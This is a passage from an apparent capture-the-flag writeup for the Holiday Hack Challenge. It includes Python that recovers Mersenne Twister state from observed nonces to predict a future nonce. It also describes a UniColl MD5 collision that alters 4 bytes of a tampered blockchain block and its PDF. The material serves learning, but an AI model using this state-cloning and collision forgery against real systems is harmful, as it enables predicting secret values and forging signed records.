    463691275 - Not random enough
    3638917918 - Not random enough
    518057808 - Not random enough

For Mersenne Twister prediction, I remembered that Momoiro Technology had written up how to do it, and built mine with that as a reference.

inaz2.hatenablog.com

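Once the seed of the Impossible board is known, setting the player name on easy difficulty to the recovered seed displays the same board.

Then, after clearing it on easy, hit the same spots on Impossible without making a mistake to clear it.

Objective 11a

The blockchain runs up to block 129996; the task is to predict the nonce of block 130000.

Clearing Snowball Fight yields OfficialNaughtyNiceBlockchainEducationPack.zip through the hints.

It includes naughty_nice.py, a script for parsing blockchain.dat. Using it reveals the nonces.

The nonce is 64 bits, so the prediction needs care. The Mersenne Twister's internal state is reset at 624 outputs; because the values here are 64-bit, the code is written with the switch every 312 values in mind.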

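import random

# Chain and RSA are provided by naughty_nice.py from the education pack; this
# snippet is assumed to be appended to that script.

def untemper(x):
    # Undo the four MT19937 tempering steps in reverse order
    x = unBitshiftRightXor(x, 18)
    x = unBitshiftLeftXor(x, 15, 0xefc60000)
    x = unBitshiftLeftXor(x, 7, 0x9d2c5680)
    x = unBitshiftRightXor(x, 11)
    return x

def unBitshiftRightXor(x, shift):
    # Invert y = x ^ (x >> shift), recovering `shift` more bits per pass
    i = 1
    y = x
    while i * shift < 32:
        z = y >> shift
        y = x ^ z
        i += 1
    return y

def unBitshiftLeftXor(x, shift, mask):
    # Invert y = x ^ ((x << shift) & mask)
    i = 1
    y = x
    while i * shift < 32:
        z = y << shift
        y = x ^ (z & mask)
        i += 1
    return y

if __name__ == '__main__':
    with open('private.pem', 'rb') as fh:
        private_key = RSA.importKey(fh.read())
    public_key = private_key.publickey()
    c1 = Chain()
    count = c1.load_chain()
    # Ring buffer of 312 nonces (= 624 32-bit MT outputs); after the loop it
    # holds the nonces of c1.blocks[936] .. c1.blocks[1247]
    value1 = [0 for i in range(312)]
    index=0
    for i in range(count+1):
        if i == 1248:
            break
        if index < 312:
            value1[index] = c1.blocks[i].nonce
            index += 1
            if index == 312:
                index = 0
    mt_state = []
    print(count)
    for x in value1:
        # getrandbits(64) emits the low 32-bit word first, then the high word
        mt_state.append(untemper(x & 0xffffffff))
        mt_state.append(untemper(x >> 32))
    # index 624 makes the generator regenerate its state on the next call
    mt_state.append(624)
    random.setstate((3,tuple(mt_state),None))
    predicted1 = [random.getrandbits(64) for i in range(305)]
    print("predicted")
    # predicted1 holds 305 values, so the last one is at index 304
    print(hex(predicted1[-1]))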

The printed 0x57066318f32f729d is the answer.
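
A self-contained check of the state-recovery idea used here and in Snowball Fight, as an added example rather than the author's script: it rebuilds a random.Random from 624 consecutive 32-bit words (or 312 64-bit values) and confirms that the clone predicts the next outputs of a locally seeded generator. It goes slightly beyond the page in that the observed window may start at any offset; the seed, the skip counts and the function names are assumptions.

```python
import random

def undo_right(y, shift):
    """Invert y = x ^ (x >> shift) on a 32-bit word."""
    x = y
    for _ in range(32 // shift + 1):      # each pass fixes `shift` more high bits
        x = y ^ (x >> shift)
    return x

def undo_left(y, shift, mask):
    """Invert y = x ^ ((x << shift) & mask) on a 32-bit word."""
    x = y
    for _ in range(32 // shift + 1):      # each pass fixes `shift` more low bits
        x = y ^ ((x << shift) & mask)
    return x

def untemper(y):
    # MT19937 tempering steps, undone last to first
    y = undo_right(y, 18)
    y = undo_left(y, 15, 0xEFC60000)
    y = undo_left(y, 7, 0x9D2C5680)
    return undo_right(y, 11)

def clone_generator(outputs, bits):
    """Rebuild a random.Random from consecutive getrandbits(bits) outputs."""
    if bits not in (32, 64):
        raise ValueError("only 32-bit and 64-bit outputs are handled")
    words = []
    for value in outputs:
        # a 64-bit value is two 32-bit words, low word generated first
        for i in range(bits // 32):
            words.append((value >> (32 * i)) & 0xFFFFFFFF)
    if len(words) < 624:
        raise ValueError("need 624 consecutive 32-bit words")
    state = tuple(untemper(w) for w in words[-624:])
    clone = random.Random()
    # position 624 forces a state regeneration on the next call, which applies
    # the MT recurrence to the recovered window wherever that window started
    clone.setstate((3, state + (624,), None))
    return clone

def predicts_correctly(bits, skip, seed=2020, lookahead=4):
    """Observe a seeded generator after `skip` outputs and test the clone."""
    target = random.Random(seed)          # constructed stand-in for the real source
    for _ in range(skip):
        target.getrandbits(bits)
    observed = [target.getrandbits(bits) for _ in range(624 * 32 // bits)]
    clone = clone_generator(observed, bits)
    expected = [target.getrandbits(bits) for _ in range(lookahead)]
    return [clone.getrandbits(bits) for _ in range(lookahead)] == expected

if __name__ == "__main__":
    print("32-bit outputs:", predicts_correctly(32, skip=1000))
    print("64-bit outputs:", predicts_correctly(64, skip=100))
```

Values that must be unpredictable, such as nonces, belong to the secrets module or os.urandom rather than random.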

11b) Naughty/Nice List with Blockchain Investigation Part 2

Difficulty: 🎄🎄🎄🎄🎄
The SHA256 of Jack's altered block is: 58a3b9335a6ceb0234c12d35a0564c4e f0e90152d0eb2ce2082383b38028a90f. If you're clever, you can recreate the original version of that block by changing the values of only 4 bytes. Once you've recreated the original block, what is the SHA256 of that block?

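Jack Frost altered part of the blockchain; the task is to fix 4 bytes and give the SHA256 of the original block.

First, find the block Jack altered. The given value contains a space; the SHA256 hash is the two halves joined together.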

import hashlib

# Chain and RSA are provided by naughty_nice.py from the education pack; this
# snippet is assumed to be appended to that script.

if __name__ == '__main__':
    with open('private.pem', 'rb') as fh:
        private_key = RSA.importKey(fh.read())
    public_key = private_key.publickey()
    c1 = Chain()
    count = c1.load_chain()
    # Walk the chain and stop at the block whose SHA256 matches Jack's altered block
    for i in range(count):
        if hashlib.sha256(c1.blocks[i].block_data_signed()).hexdigest() == "58a3b9335a6ceb0234c12d35a0564c4ef0e90152d0eb2ce2082383b38028a90f":
            print(i)
            break

----
Output
1011
Chain Index: 129459
              Nonce: a9447e5771c704f4
                PID: 0000000000012fd1
                RID: 000000000000020f
     Document Count: 2
              Score: ffffffff (4294967295)
               Sign: 1 (Nice)
         Data item: 1
               Data Type: ff (Binary blob)
             Data Length: 0000006c
                    Data: b'ea465340303a6079d3df2762be68467c27f046d3a7ff4e92dfe1def7407f2a7b73e1b759b8b919451e37518d22d987296fcb0f188dd60388bf20350f2a91c29d0348614dc0bceef2bcadd4cc3f251ba8f9fbaf171a06df1e1fd8649396ab86f9d5118cc8d8204b4ffe8d8f09'
         Data item: 2
               Data Type: 05 (PDF)
             Data Length: 00009f57
                    Data: b'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'
               Date: 03/24
               Time: 13:21:41
       PreviousHash: 4a91947439046c2dbaa96db38e924665
  Data Hash to Sign: 347979fece8d403e06f89f8633b5231a
          Signature: b'MJIxJy2iFXJRCN1EwDsqO9NzE2Dq1qlvZuFFlljmQ03+erFpqqgSI1xhfAwlfmI2MqZWXA9RDTVw3+aWPq2S0CKuKvXkDOrX92cPUz5wEMYNfuxrpOFhrK2sks0yeQWPsHFEV4cl6jtkZ//OwdIznTuVgfuA8UDcnqCpzSV9Uu8ugZpAlUY43Y40ecJPFoI/xi+VU4xM0+9vjY0EmQijOj5k89/AbMAD2R3UbFNmmR61w7cVLrDhx3XwTdY2RCc3ovnUYmhgPNnduKIUA/zKbuu95FFi5M2r6c5Mt6F+c9EdLza24xX2J4l3YbmagR/AEBaF9EBMDZ1o5cMTMCtHfw=='

b10b4a6bd373b61f32f4fd3a0cdfbf84

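Running it suggests that the 1011th entry is the one that was tampered with. Of its contents, one item is an unintelligible data file and the other is a PDF file.

Writing the file out gives the following, which lavishes praise on Jack. This is suspicious.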

[Figure: Nice Jack]

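The hints point to slides on MD5 collisions and a GitHub repository, so I take a look.

One property of hashes is that when two different pieces of data have the same hash value, appending the same string to each of them still yields identical hash values. The GitHub repository states it as well, as follows.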

hash(A) = hash(B) -> hash(A + C) = hash(B + C)
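
The property quoted above, shown on a toy hash as an added example (not code from this writeup or from the linked repository): a 24-bit Merkle-Damgård construction stands in for MD5 so that a colliding pair of blocks can be found by brute force in well under a second. The property holds because A and B have the same length and leave the same chaining value, so every later block is processed identically, while SHA-256 over the same inputs still tells them apart. Block size, state size and all names are assumptions of the example.

```python
import hashlib

BLOCK = 8            # toy block size in bytes (MD5 uses 64)
STATE = 3            # toy chaining value in bytes (MD5 uses 16)
IV = b"\x00" * STATE

def compress(state, block):
    # Toy compression function: SHA-256 over chaining value + block, truncated.
    return hashlib.sha256(state + block).digest()[:STATE]

def toy_hash(message):
    """Merkle-Damgard hash: pad with 0x80, zeros and the length, then chain."""
    padded = message + b"\x80"
    padded += b"\x00" * (-(len(padded) + 8) % BLOCK)
    padded += len(message).to_bytes(8, "big")
    state = IV
    for i in range(0, len(padded), BLOCK):
        state = compress(state, padded[i:i + BLOCK])
    return state.hex()

def find_block_collision():
    """Birthday search for two one-block messages with the same chaining value."""
    seen = {}
    counter = 0
    while True:                       # about 2**12 tries for a 24-bit state
        block = counter.to_bytes(BLOCK, "big")
        state = compress(IV, block)
        if state in seen:
            return seen[state], block
        seen[state] = block
        counter += 1

def suffix_experiment(suffixes):
    """Append each suffix C to the colliding pair A, B and compare digests."""
    a, b = find_block_collision()
    rows = []
    for c in suffixes:
        rows.append({
            "suffix": c,
            "toy_equal": toy_hash(a + c) == toy_hash(b + c),
            "sha256_equal": hashlib.sha256(a + c).digest() == hashlib.sha256(b + c).digest(),
        })
    return a, b, rows

if __name__ == "__main__":
    a, b, rows = suffix_experiment([b"", b" 0 R", b"x" * 100])   # constructed suffixes
    print("A =", a.hex(), " B =", b.hex())
    for row in rows:
        print(row)
```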

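Since only 4 bytes need to change here, I looked through the techniques listed there; one called UniColl apparently keeps the MD5 identical with a 2-byte change.

Reading the PDF attack section of the GitHub repository shows that UniColl can be applied by manipulating the PDF structure and a comment.

Inspecting the file with PDF-parser shows a strange comment inserted after the page reference. Multiple pages are also planted, so it looks like changing the 2 to a 3 and then rewriting the appropriate single byte in the comment that follows should do it.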

obj 1 0
 Type: /Catalog
 Referencing: 2 0 R

  <<
    /Type /Catalog
    /_Go_Away /Santa
    /Pages '2 0 R      0\xf9\xd9\xbfW\x8e<\xaa\xe5\rx\x8f\xe7`\xf3\x1dd\xaf\xaa\x1e\xa1\xf2\xa1=cu>\x1a\xa5\xbf\x80bO\xc3F\xbf\xd6g\xca\xf7I\x95\x91\xc4\x02\x01\xed\xab\x03\xb9\xef\x95\x99\x1c[I\x9f\x86\xdc\x859\x85\x90\x99\xadT\xb0\x1es?\xe5\xa7\xa4\x89\xb92\x95\xffTh\x03MIy8\xe8\xf9\xb8\xcb:\xc3\xcfP\xf0\x1b2[\x9b\x17tu\x95B+sx\xf0%\x02\xe1\xa9\xb0\xac\x85(\x01z\x9e'
  >>


obj 2 0
 Type: /Pages
 Referencing: 23 0 R

  <<
    /Type /Pages
    /Count 1
    /Kids [23 0 R]
  >>


obj 3 0
 Type: /Pages
 Referencing: 15 0 R

  <<
    /Type /Pages
    /Count 1
    /Kids [15 0 R]
  >>

Looking at it after the rewrite, the PDF content changes. It now says that Jack is a bad guy.

[Figure: Naughty Jack]

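But this accounts for only 2 of the 4 bytes, so I look for the other 2.

While searching with the help of various hints, I noticed that the Sign: 1 (Nice) field in the block is wrong. It makes no sense for Jack to be rated Nice once the PDF content is changed, so this needs to become 0 (Naughty).

Change this to 0 and modify the data as UniColl prescribes so that the MD5 matches. That identifies the 4 bytes to change, but when I edited the binary data in vim it did not work, because using %!xxd in vim appends a newline at the end....

In the end the diff looked like this.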

[Figure: MD5 collision]

With the MD5 colliding as well, all that remains is to compute the hash with sha256sum.

$ sha256sum col.dat
fff054f33c2134e0230efb29dad515064ac97aa8c68d33c58c01213a0d408afb    col.dat

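It is quite a shock that with UniColl, merely incrementing or decrementing the 10th byte of the crafted binary data by 1 yields data with the same MD5.

After solving this objective, I went to Santa's office and found that the back room, which had been closed, was now accessible.

Talking to Jack, it seems he is headed to prison.

Going to the back and talking to Santa starts the staff roll.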

[Figure: The final room]

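Thoughts after finishing

My impression is that even in completely unfamiliar areas you can solve things by relying on the hints, and you learn a lot along the way.

Around UniColl in particular, there are apparently other hash-collision techniques as well, so there is still plenty more to study.

Also, it is best to write the writeup as you solve. I started writing only after solving everything and regretted it: I had to write from memory, and my own notes turned out to be unreliable.

As I wrote at the beginning, the Holiday Hack Challenge can still be played now, so if it sounds interesting, give it a try!!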